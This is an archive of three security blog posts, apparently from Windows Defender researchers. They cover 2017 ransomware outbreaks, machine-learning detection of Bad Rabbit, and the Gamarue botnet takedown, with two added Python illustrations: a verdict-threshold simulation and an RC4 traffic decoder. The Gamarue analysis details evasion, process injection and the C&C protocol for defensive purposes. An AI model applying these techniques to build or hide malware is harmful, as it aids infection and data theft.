Archive for the ‘Security Intelligence’ Category

A worthy upgrade: Next-gen security on Windows 10 proves resilient against ransomware outbreaks in 2017

January 10th, 2018

Adopting reliable attack methods and techniques borrowed from more evolved threat types, ransomware attained new levels of reach and damage in 2017. The following trends characterize the ransomware narrative in the past year:

  • Three global outbreaks showed the force of ransomware in making real-world impact, affecting corporate networks and bringing down critical services like hospitals, transportation, and traffic systems
  • Three million unique computers encountered ransomware; millions more saw downloader trojans, exploits, emails, websites and other components of the ransomware kill chain
  • New attack vectors, including compromised supply chain, exploits, phishing emails, and documents taking advantage of the DDE feature in Office were used to deliver ransomware
  • More than 120 new ransomware families, plus countless variants of established families and less prevalent ransomware caught by heuristic and generic detections, emerged from a thriving cybercriminal enterprise powered by ransomware-as-a-service

The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack vectors, makes older platforms much more susceptible to ransomware attacks. From June to November, Windows 7 devices were 3.4 times more likely to encounter ransomware than Windows 10 devices. Considering that Windows 10 has a much larger install base than Windows 7, this difference in ransomware encounter rate is significant.

Figure 1. Ransomware encounter rates on Windows 7 and Windows 10 devices. Encounter rate refers to the percentage of computers running the OS version with Microsoft real-time security that blocked or detected ransomware.

The data shows that attackers are targeting Windows 7. Given today's modern threats, older platforms can be infiltrated more easily because they don't have the advanced built-in end-to-end defense stack available on Windows 10. Continuous enhancements further make Windows 10 more resilient to ransomware and other types of attack.

Windows 10: Multi-layer defense against ransomware attacks

The year 2017 saw three global ransomware outbreaks driven by multiple propagation and infection techniques that are not necessarily new but not typically observed in ransomware. While there are technologies available on Windows 7 to mitigate attacks, Windows 10's comprehensive set of platform mitigations and next-generation technologies covers these attack methods. Additionally, Windows 10 S, a configuration of Windows 10 that's streamlined for security and performance, locks down devices against ransomware outbreaks and other threats.

In May, WannaCry (Ransom:Win32/WannaCrypt) caused the first global ransomware outbreak. It used EternalBlue, an exploit for a previously fixed SMBv1 vulnerability, to infect computers and spread across networks at speeds never before observed in ransomware.

On Windows 7, Windows AppLocker and antimalware solutions like Microsoft Security Essentials and System Center Endpoint Protection (SCEP) can block the infection process. However, because WannaCry used an exploit to spread and infect devices, networks with vulnerable Windows 7 devices fell victim. The WannaCry outbreak highlighted the importance of keeping platforms and software up-to-date, especially with critical security patches.

Windows 10 was not at risk from the WannaCry attack. Windows 10 has security technologies that can block the WannaCry ransomware and its spreading mechanism. Built-in exploit mitigations on Windows 10 (KASLR, NX HAL, and PAGE POOL), as well as kCFG (control-flow guard for kernel) and HVCI (kernel code-integrity), make Windows 10 much more difficult to exploit.

Figure 2. Windows 7 and Windows 10 platform defenses against WannaCry

In June, Petya (Ransom:Win32/Petya.B) used the same exploit that gave WannaCry its spreading capabilities, and added more propagation and infection methods to give birth to arguably the most complex ransomware in 2017. Petya's initial infection vector was a compromised software supply chain, but the ransomware quickly spread using the EternalBlue and EternalRomance exploits, as well as a module for lateral movement using stolen credentials.

On Windows 7, Windows AppLocker can stop Petya from infecting the device. If a Windows 7 device was fully patched, Petya's exploitation behavior did not work. However, Petya also stole credentials, which it then used to spread across networks. Once it was running on a Windows 7 device, only an up-to-date antivirus that had protection in place at zero hour could stop Petya from encrypting files or tampering with the master boot record (MBR).

On the other hand, on Windows 10, Petya had more layers of defenses to overcome. Apart from Windows AppLocker, Windows Defender Application Control can block Petya's entry vector (i.e., a compromised software updater running an untrusted binary), as well as the propagation techniques that used untrusted DLLs. Windows 10's built-in exploit mitigations can further protect Windows 10 devices from the Petya exploit. Credential Guard can prevent Petya from stealing credentials from the local security authority subsystem service (LSASS), helping curb the ransomware's propagation technique. Meanwhile, Windows Defender System Guard (Secure Boot) can stop the MBR modified by Petya from being loaded at boot time, preventing the ransomware from causing damage to the master file table (MFT).

Figure 3. Windows 7 and Windows 10 platform defenses against Petya

In October, another sophisticated ransomware reared its ugly head: Bad Rabbit ransomware (Ransom:Win32/Tibbar.A) infected devices by posing as an Adobe Flash installer available for download on compromised websites. Similar to WannaCry and Petya, Bad Rabbit had spreading capabilities, albeit more traditional: it used a hardcoded list of user names and passwords. Like Petya, it can also render infected devices unbootable, because, in addition to encrypting files, it also encrypted entire disks.

On Windows 7 devices, several security technologies can block the download and installation of the ransomware, but protecting the device from the damaging payload and preventing it from infecting other computers in the network can be tricky.

With Windows 10, however, in addition to stronger defense at the infection vector, corporate networks were safer from this damaging threat because several technologies are available to stop or detect Bad Rabbit's attempts to spread across networks using exploits or hardcoded user names and passwords.

More importantly, during the Bad Rabbit outbreak, detonation-based machine learning models in the Windows Defender AV cloud protection service, with no human intervention, correctly classified the malware 14 minutes after the very first encounter. These detonation-based ML models are part of several layers of machine learning and artificial intelligence technologies that evaluate files in order to reach a verdict on suspected malware. Using this layered approach, Windows Defender AV protected Windows 10 devices with cloud protection enabled from Bad Rabbit within minutes of the outbreak.

Figure 4. Windows 7 and Windows 10 platform defenses against Bad Rabbit

As these outbreaks demonstrated, ransomware has indeed become a highly complex threat that can be expected to continue evolving in 2018 and beyond. The multiple layers of next-generation security technologies on Windows 10 are designed to disrupt the attack methods that we have previously seen in highly specialized malware but now also see in ransomware.

Ransomware protection on Windows 10

For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.

Controlled folder access, however, is but one layer of defense. Ransomware and other threats from the web can be blocked by Microsoft Edge, whose exploit mitigation and sandbox features make it a very secure browser. Microsoft Edge significantly improves web security by using Windows Defender SmartScreen's reputation-based blocking of malicious downloads and by opening pages within low-privilege app containers.

Windows Defender Antivirus also continues to enhance defense against threats like ransomware. Its advanced generic and heuristic techniques and layered machine learning models help catch both common and rare ransomware families. Windows Defender AV can detect and block most malware, including never-before-seen ransomware, using generics and heuristics, local ML models, and metadata-based ML models in the cloud. In rare cases where a threat slips past these layers of protection, Windows Defender AV can protect patient zero in real-time using analysis-based ML models, as demonstrated in a real-life case where a customer was protected from a very new Spora ransomware variant in a matter of seconds. In even rarer cases of inconclusive initial classification, additional automated analysis and ML models can still protect customers within minutes, as happened during the Bad Rabbit outbreak.

Windows 10 S locks down devices from unauthorized content by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common entry points for ransomware and other threats.

Reducing the attack surface for ransomware and other threats in corporate networks

For enterprises and small businesses, the impact of ransomware is graver. Losing access to files can mean disrupted operations. Big enterprise networks, including critical infrastructures, fell victim to ransomware outbreaks. The modern enterprise network is under constant assault by attackers and needs to be defended on all fronts.

Windows Defender Exploit Guard locks down devices against a wide variety of attack vectors. Its host intrusion prevention capabilities include the following components, which block behaviors commonly used in malware attacks:

  • Attack Surface Reduction (ASR) is a set of controls that blocks common ransomware entry points: Office-, script-, and email-based threats that download and install ransomware; ASR can also protect from emerging exploits like DDEDownloader, which has been used to distribute ransomware
  • Network protection uses Windows Defender SmartScreen to block outbound connections to untrusted hosts, such as when trojan downloaders connect to a malicious server to obtain ransomware payloads
  • Controlled folder access blocks ransomware and other untrusted processes from accessing protected folders and encrypting files in those folders
  • Exploit protection (replacing EMET) provides mitigation against a broad set of exploit techniques that are now being used by ransomware authors

Additionally, the industry-best browser security in Microsoft Edge is enhanced by Windows Defender Application Guard, which brings Azure cloud-grade isolation and security segmentation to Windows applications. This hardware-level isolation capability provides one of the highest levels of protection against zero-day exploits, unpatched vulnerabilities, and web-based malware.

For emails, Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers against ransomware attacks that begin with email. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Integrated security for enterprises

Windows Defender Advanced Threat Protection allows SecOps personnel to stop the spread of ransomware through timely detection of ransomware activity in the network. Windows Defender ATP's enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware attack kill-chain, enabling SecOps to promptly investigate and respond to ransomware attacks.

With Windows 10 Fall Creators Update, Windows Defender ATP was expanded to include seamless integration across the entire Windows protection stack, including Windows Defender Exploit Guard, Windows Defender Application Guard, and Windows Defender AV. This integration is designed to provide a single pane of glass for a seamless security management experience.

With all of these security technologies, Microsoft has built the most secure Windows version ever with Windows 10. While the threat landscape will continue to evolve in 2018 and beyond, we don't stop innovating and investing in security solutions that continue to harden Windows 10 against attacks. The twice-per-year feature update release cycle reflects our commitment to innovate and to make it easier to disrupt successful attack techniques with new protection features. Upgrading to Windows 10 not only means decreased risk; it also means access to advanced, multi-layered defense against ransomware and other types of modern attacks.

Tanmay Ganacharya (@tanmayg)
Principal Group Manager, Windows Defender Research

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses

December 11th, 2017

Windows Defender Antivirus uses a layered approach to protection: tiers of advanced automation and machine learning models evaluate files in order to reach a verdict on suspected malware. While Windows Defender AV detects a vast majority of new malware files at first sight, we always strive to further close the gap between malware release and detection.

In a previous blog post, we looked at a real-world case study showing how the Windows Defender Antivirus cloud protection service leverages next-gen security technologies to save "patient zero" from new malware threats in real-time. In that case study, a new Spora ransomware variant was analyzed and blocked within seconds using a deep neural network (DNN) machine learning classifier in the cloud. In this blog post we'll look at how additional automated analysis and machine learning models can further protect customers within minutes in rare cases where initial classification is inconclusive.

Layered machine learning models

In Windows Defender AV's layered approach to defense, if the first layer doesn't detect a threat, we move on to the next level of inspection. As we move down the layers, the amount of time required increases. However, we catch the vast majority of malware at the first (fastest) protection layers and only need to move on to a more sophisticated (but slower) level of inspection for rarer or more advanced threats.

For example, the vast majority of scanned objects are evaluated by the local Windows Defender client machine learning models, behavior-based detection algorithms, generic and heuristic classifications, and more. This helps ensure that users get the best possible performance. In rare cases where local intelligence can't reach a definitive verdict, Windows Defender AV will use the cloud for deeper analysis.

Figure 1. Layered detection model

For a more detailed look at our approach to protection, see The evolution of malware prevention.

Detonation-based machine learning classification

We use a variety of machine learning models that use different algorithms to predict whether a certain file is malware. Some of these algorithms are binary classifiers that give a strict clean-or-malware verdict (0 or 1), while others are multi-class classifiers that provide a probability for each classification (malware, clean, potentially unwanted application, etc.). Each machine learning model is trained against a set of different features (often thousands, sometimes hundreds of thousands) to learn to distinguish between different kinds of programs.

For the fastest classifiers in our layered stack, the features may include static attributes of the file combined with events (for example, API calls or behaviors) seen while the scanning engine emulates the file using dynamic translation. If the results from these models are inconclusive, we'll take an even more in-depth look at what the malware does by actually executing it in a sandbox and observing its run-time behavior. This is known as dynamic analysis, or detonation, and happens automatically whenever we receive a new suspected malware sample.

The activities seen in the sandbox machine (for example, registry changes, file creation/deletion, process injection, network connections, and so forth) are recorded and provided as features to our ML models. These models can then combine both the static features obtained from scanning the file with the dynamic features observed during detonation to arrive at an even stronger prediction.

Figure 2. Detonation-based machine learning classification

Ransom:Win32/Tibbar.A: Protection in 14 minutes

On October 24, 2017, in the wake of recent ransomware outbreaks such as WannaCry and NotPetya, news broke of a new threat spreading, primarily in Ukraine and Russia: Ransom:Win32/Tibbar.A (popularly known as Bad Rabbit).

This threat is a good example of how detonation-based machine learning came into play to protect Windows Defender AV customers. First though, let's look at what happened to patient zero.

At 11:17 a.m. local time on October 24, a user running Windows Defender AV in St. Petersburg, Russia was tricked into downloading a file named FlashUtil.exe from a malicious website. Instead of a Flash update, the program was really the just-released Tibbar ransomware.

Windows Defender AV scanned the file and determined that it was suspicious. A query was sent to the cloud protection service, where several metadata-based machine learning models found the file suspicious, but not with a high enough probability to block. The cloud protection service requested that the Windows Defender AV client lock the file, upload it for processing, and wait for a decision.

Within a few seconds the file was processed, and sample-analysis-based ML models returned their conclusions. In this case, a multi-class deep neural network (DNN) machine learning classifier correctly classified the Tibbar sample as malware, but with only an 81.6% probability score. In order to avoid false positives, the cloud protection service is configured by default to require at least 90% probability to block the malware (these thresholds are continually evaluated and fine-tuned to find the right balance between blocking malware and avoiding the blocking of legitimate programs). In this case, the ransomware was allowed to run.

Figure 3. Ransom:Win32/Tibbar.A ransom note

Detonation chamber

In the meantime, while patient zero and eight other unfortunate victims (in Ukraine, Russia, Israel, and Bulgaria) contemplated whether to pay the ransom, the sample was detonated and details of the system changes made by the ransomware were recorded.

Figure 4. Sample detonation events used by the machine learning model

As soon as the detonation results were available, a multi-class deep neural network (DNN) classifier that used both static and dynamic features evaluated the results and classified the sample as malware with 90.7% confidence, high enough for the cloud to start blocking.

When a tenth Windows Defender AV customer, in Ukraine, was tricked into downloading the ransomware at 11:31 a.m. local time, 14 minutes after the first encounter, the cloud protection service used the detonation-based malware classification to immediately block the file and protect the customer.

At this point the cloud protection service had “learned” that this file was malware. It now only required metadata from the client with the hash of the file to issue blocking decisions and protect customers. As the attack gained momentum and began to spread, Windows Defender AV customers with cloud protection enabled were protected. Later, a more specific detection was released to identify the malware as Ransom:Win32/Tibbar.A.

Closing the gap

While we feel good about Windows Defender AV's layered approach to protection, digging deeper and deeper with automation and machine learning in order to finally reach a verdict on suspected malware, we are continually seeking to close the gap even further between malware release and protection. The cases where we cannot block at first sight are increasingly rare, but there is still much to be done. As our machine learning models are continuously updated and retrained, we are able to make better predictions over time. Yet malware authors will not rest, and the ever-changing threat landscape requires continuous investment in new and better technologies, not only to detect new threats but also to effectively differentiate the good from the bad.

What about systems that do get infected while detonation and classification are underway? One area that we’re actively investing in is advanced remediation techniques that will let us reach back out to those systems in an organization that were vulnerable and, if possible, get them back to a healthy state.

If you are an organization that is willing to accept a higher false positive risk in exchange for stronger protection, you can configure the cloud protection level to tell the Windows Defender AV cloud protection service to take a more aggressive stance towards suspicious files, such as blocking at lower machine learning probability thresholds. In the Tibbar example above, a configuration like this could have protected patient zero using the initial 81% confidence score, rather than waiting for the higher-confidence (detonation-based) result that came later. You can also configure the cloud extended timeout to give the cloud protection service more time to evaluate a first-seen threat.
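The following is an added illustration, not Windows Defender code, of the layered cloud-verdict flow the Tibbar timeline above describes: metadata models first, then sample-analysis models, then detonation, each gated by a block threshold, with the file's hash cached as known-bad once the cloud has "learned" it. The 81.6%, 90.7% and 90% figures are the ones quoted in the post; the stage latencies, the client wait time, the "aggressive" threshold and the two sample files are constructed assumptions. It also shows what the cloud protection level and extended timeout settings change in that flow.

```python
"""
Layered cloud verdict pipeline (illustrative, not Windows Defender code).
Scores 0.816 / 0.907 and the 0.90 default threshold come from the post;
latencies, wait times, the aggressive threshold and samples are constructed.
"""
from dataclasses import dataclass, field
import hashlib

DEFAULT_BLOCK_THRESHOLD = 0.90     # post: default requires at least 90% to block
AGGRESSIVE_BLOCK_THRESHOLD = 0.80  # constructed: a higher "cloud protection level"
DEFAULT_CLIENT_WAIT_S = 10.0       # constructed: how long the client holds the file


@dataclass
class Stage:
    name: str         # key into sample["scores"]; each stage is a separate model
    latency_s: float  # constructed cost of running this stage


# Ordered from cheapest to slowest, as in the post's layered model.
PIPELINE = [
    Stage("metadata", 1.0),         # metadata-based models, no upload needed
    Stage("sample_analysis", 5.0),  # DNN over the uploaded file, "within seconds"
    Stage("detonation", 834.0),     # sandbox run + static/dynamic DNN; 840 s total = 14 min
]


@dataclass
class CloudProtection:
    block_threshold: float = DEFAULT_BLOCK_THRESHOLD
    stages: list = field(default_factory=lambda: list(PIPELINE))
    known_bad: set = field(default_factory=set)  # hashes the cloud has "learned"

    def query(self, sample: dict, client_wait_s: float = DEFAULT_CLIENT_WAIT_S) -> dict:
        """Return the verdict the client acts on. The cloud keeps running the
        later stages past the client's wait so that the hash cache is ready
        for the next encounter of the same file."""
        h = sample["sha256"]
        if h in self.known_bad:
            return {"verdict": "block", "stage": "hash-cache", "score": 1.0, "elapsed_s": 0.0}
        elapsed, last_name, last_score, client_verdict = 0.0, "none", 0.0, None
        for stage in self.stages:
            if client_verdict is None and elapsed + stage.latency_s > client_wait_s:
                # Client timeout: the file is released on the best score so far.
                client_verdict = {"verdict": "allow", "stage": last_name,
                                  "score": last_score, "elapsed_s": elapsed}
            elapsed += stage.latency_s
            last_name, last_score = stage.name, sample["scores"][stage.name]
            if last_score >= self.block_threshold:
                self.known_bad.add(h)  # later queries for this hash block at once
                if client_verdict is None:
                    client_verdict = {"verdict": "block", "stage": last_name,
                                      "score": last_score, "elapsed_s": elapsed}
                break
        if client_verdict is None:  # every stage ran inside the wait, none blocked
            client_verdict = {"verdict": "allow", "stage": last_name,
                              "score": last_score, "elapsed_s": elapsed}
        return client_verdict


def make_sample(label: str, metadata: float, sample_analysis: float, detonation: float) -> dict:
    """Constructed sample: the hash is SHA-256 of a label, the scores are the
    malware probabilities each stage's model would report for it."""
    return {"sha256": hashlib.sha256(label.encode()).hexdigest(),
            "scores": {"metadata": metadata, "sample_analysis": sample_analysis,
                       "detonation": detonation}}


TIBBAR = make_sample("constructed-tibbar-sample", 0.60, 0.816, 0.907)
CLEAN = make_sample("constructed-clean-installer", 0.10, 0.20, 0.15)


def replay_tibbar(threshold: float = DEFAULT_BLOCK_THRESHOLD,
                  client_wait_s: float = DEFAULT_CLIENT_WAIT_S) -> tuple:
    """Patient zero's verdict, then the verdict for the next customer who
    downloads the same file after detonation has finished."""
    cloud = CloudProtection(block_threshold=threshold)
    first = cloud.query(TIBBAR, client_wait_s)
    later = cloud.query(TIBBAR, client_wait_s)
    return first, later


if __name__ == "__main__":
    print("default threshold:", replay_tibbar())
    print("aggressive threshold:", replay_tibbar(AGGRESSIVE_BLOCK_THRESHOLD))
    print("clean file, extended timeout:", CloudProtection().query(CLEAN, 900.0))
```

With the default threshold, patient zero gets "allow" on the 0.816 sample-analysis score and the detonation result only populates the cache for the next encounter; lowering the threshold to 0.80 blocks patient zero at the sample-analysis stage, and a longer client wait lets the clean file run through all three stages without ever being blocked or cached.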

As another layer of real-time protection against ransomware, enable Controlled folder access, which is one of the features of the new Windows Defender Exploit Guard. Controlled folder access protects files from tampering by locking folders so that ransomware and other unauthorized apps can't access them.

For enterprises, Windows Defender Exploit Guard's other features (Attack Surface Reduction, Exploit protection, and Network protection) further protect networks from advanced attacks. Windows Defender Advanced Threat Protection can also alert security operations personnel about malware activities in the network so that personnel can promptly investigate and respond to attacks.

For users running Windows 10 S, malware like Tibbar simply won't run. Windows 10 S provides advanced levels of security by exclusively running apps from the Microsoft Store. Threats such as Tibbar are non-issues for Windows 10 S users. Learn more about Windows 10 S.

New machine learning and AI techniques, in combination with both static and dynamic analysis, give Windows Defender AV the ability to block more and more malware threats at first sight and, if that fails, to learn as quickly as possible that something is bad and start blocking it. Using a layered approach, with different ML models at each layer, gives us the ability to target a wide variety of threats quickly while maintaining low false positive rates. As we gather more data about a potential threat, we can provide predictions with higher and higher confidence and take action accordingly. It is an exciting time to be in the fray.

Randy Treit

Senior Security Researcher, Windows Defender Research

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

December 4th, 2017

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarue's sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnet's command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnet's servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarue's global prevalence.

Figure 1. Gamarues global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) – Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc.
  • Rootkit (included in crime kit) – Injects rootkit code into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) – Turns the victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) – Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer)
  • Teamviewer ($250) – Enables the attacker to remotely control the victim machine, spy on the desktop, and perform file transfers, among other functions
  • Spreader – Adds the capability to spread the Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses a domain generation algorithm (DGA) for the servers from which it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarue's attack kill-chain

Gamarue's main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information like the hard disk's volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication of whether the signed-in user has administrative rights, and the keyboard language setting of the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about the keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to one of the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazakhstan

Before being sent to the C&C server, this information is encrypted with the RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue's presence on infected machines.

The reply from the C&C server is also encrypted with the RC4 algorithm, using the same key used to encrypt the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval – in minutes, the time to wait before asking the C2 server for the next command
  • Task ID – used by the hacker to track whether there was an error performing the task
  • Command – one of the commands mentioned above
  • Download URL – from which a plugin, updated binary, or other malware can be downloaded, depending on the command

Figure 9. Decrypted reply from C&C server
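An analyst looking at captured Gamarue-style traffic needs to undo exactly the two steps described above: strip the RC4 layer (one hardcoded key, same key in both directions) and parse the JSON underneath, then read off the command and callback interval from the reply. The decoder below is an added example written for that purpose; it is not Gamarue's or Microsoft's code. The key, the JSON field names and the two sample messages are constructed placeholders, since the post does not give the real key or wire format.

```python
"""
Decoder for Gamarue-style C&C traffic: RC4 around a JSON body.
Added analyst example; key, field names and sample messages are constructed.
"""
import json

# Placeholder key: real samples carry their own hardcoded key, not reproduced here.
PLACEHOLDER_KEY = b"example-rc4-key-not-from-a-sample"

# Commands the post lists; the last three remove evidence of the infection,
# which is worth flagging when triaging captured replies.
COMMANDS = {"Download EXE", "Download DLL", "Install plugin", "Update bot",
            "Delete DLLs", "Delete plugins", "Kill bot"}
EVIDENCE_REMOVAL = {"Delete DLLs", "Delete plugins", "Kill bot"}


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling + keystream generation). Encryption and
    decryption are the same operation, so one key serves both directions."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_message(key: bytes, blob: bytes) -> dict:
    """Decrypt a captured blob and parse the JSON inside. A wrong key yields
    bytes that are not UTF-8 JSON, so the failure is explicit, not silent."""
    plain = rc4(key, blob)
    try:
        return json.loads(plain.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("blob does not decrypt to JSON under this key") from exc


def key_fits(key: bytes, blob: bytes) -> bool:
    """Cheap check of a candidate key (e.g. one pulled from a sample) against a capture."""
    try:
        decode_message(key, blob)
        return True
    except ValueError:
        return False


def triage_reply(reply: dict) -> dict:
    """Summarise a decrypted reply: what the bot was told to do, whether that
    erases evidence, where any payload comes from, and when it calls back."""
    cmd = reply["command"]
    if cmd not in COMMANDS:
        raise ValueError(f"unknown command {cmd!r}")
    return {
        "command": cmd,
        "task_id": reply["task_id"],
        "evidence_removal": cmd in EVIDENCE_REMOVAL,
        "payload_url": reply.get("url") or None,
        "next_contact_minutes": reply["interval"],
    }


# Constructed check-in mirroring the fields the post lists (the field names are
# this example's own choice). 192.0.2.0/24 is the documentation address range.
SAMPLE_CHECKIN = {
    "id": "1A2B3C4D",    # volume serial number, used as bot ID
    "bid": 2100,         # build ID
    "os": "6.1",         # Windows version of the infected machine
    "la": "192.0.2.10",  # local IP address
    "rg": 1,             # 1 = signed-in user has administrative rights
    "kl": "en-US",       # keyboard language setting
}
# Constructed reply: an evidence-removal command with no download.
SAMPLE_REPLY = {"interval": 30, "task_id": 7, "command": "Delete plugins", "url": ""}

# Encrypted as they would travel on the wire, so the decoder runs end to end.
SAMPLE_CHECKIN_BLOB = rc4(PLACEHOLDER_KEY, json.dumps(SAMPLE_CHECKIN).encode())
SAMPLE_REPLY_BLOB = rc4(PLACEHOLDER_KEY, json.dumps(SAMPLE_REPLY).encode())

if __name__ == "__main__":
    print("check-in:", decode_message(PLACEHOLDER_KEY, SAMPLE_CHECKIN_BLOB))
    print("reply:", triage_reply(decode_message(PLACEHOLDER_KEY, SAMPLE_REPLY_BLOB)))
```

Because RC4 is a stream cipher with no integrity check, the decoder relies on the decrypted bytes parsing as JSON to tell a right key from a wrong one; `key_fits` is the practical form of that check when several candidate keys recovered from different builds have to be matched against one capture.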

Anti-sandbox techniques

Gamarue employs anti-AV techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue checks a list of hashes of the processes running on a potential victim's machine. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. In older versions, a decoy payload is presented instead when running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating systems of infected computers by disabling the Firewall, Windows Update, and User Account Control functions. These functionalities cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10.

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn using Gamarue. Since Gamarue's main purpose is to distribute other malware, hackers earn through a pay-per-install scheme. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developer's.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATP's enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

